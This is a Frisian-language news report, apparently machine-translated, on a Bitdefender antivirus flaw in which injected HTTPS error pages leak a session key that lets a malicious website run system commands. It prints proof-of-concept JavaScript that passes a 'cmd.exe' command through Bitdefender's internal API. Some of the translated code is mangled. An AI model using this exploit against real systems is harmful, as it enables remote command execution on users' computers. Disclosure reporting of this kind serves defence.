Vladimir Palant, makker fan Adblock Plus,
De oarsaak fan it probleem is dat Bitdefender-antivirus lokale ûnderskepping fan HTTPS-ferkear útfiert troch it orizjinele TLS-sertifikaat fan 'e side te ferfangen. In ekstra root-sertifikaat is ynstalleare op it systeem fan 'e kliïnt, wêrtroch it mooglik is om de wurking fan it brûkte ferkearsynspeksjesysteem te ferbergjen. It antyvirus kilet him yn beskerme ferkear en foeget syn eigen JavaScript-koade yn op guon siden om de Safe Search-funksje te ymplementearjen, en yn gefal fan problemen mei it feilige ferbiningssertifikaat ferfangt it de weromjûne flaterside mei syn eigen. Sûnt de nije flaterside wurdt tsjinne út namme fan de tsjinner dy't iepene wurdt, hawwe oare siden op dy tsjinner folsleine tagong ta de ynhâld ynfoege troch Bitdefender.
By it iepenjen fan in side dy't kontrolearre wurdt troch in oanfaller, kin dy side in XMLHttpRequest stjoere en problemen mei it HTTPS-sertifikaat ferstjoere by it reagearjen, wat sil liede ta it weromkommen fan in flaterside dy't troch Bitdefender is spoofed. Sûnt de flaterside wurdt iepene yn 'e kontekst fan it domein fan' e oanfaller, kin hy de ynhâld fan 'e spoofed side lêze mei Bitdefender-parameters. De side levere troch Bitdefender befettet ek in sesje-kaai wêrmei jo de ynterne Bitdefender API kinne brûke om in aparte Safepay-blêder-sesje te starten, opjaan fan willekeurige kommandorigelflaggen, en om alle systeemkommando's te starten mei it "--utility-cmd-prefix" flagge. In foarbyld fan in eksploitaasje (param1 en param2 binne wearden krigen fan 'e flaterside):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Ynhâld-type", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Lit ús ûnthâlde dat in stúdzje útfierd yn 2017
Allinnich 11 fan 'e 26 produkten levere aktuele sifersuites. 5 systemen hawwe gjin sertifikaten ferifiearre (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security en Total Security produkten wiene ûnderwurpen oan oanfal
Boarne: opennet.ru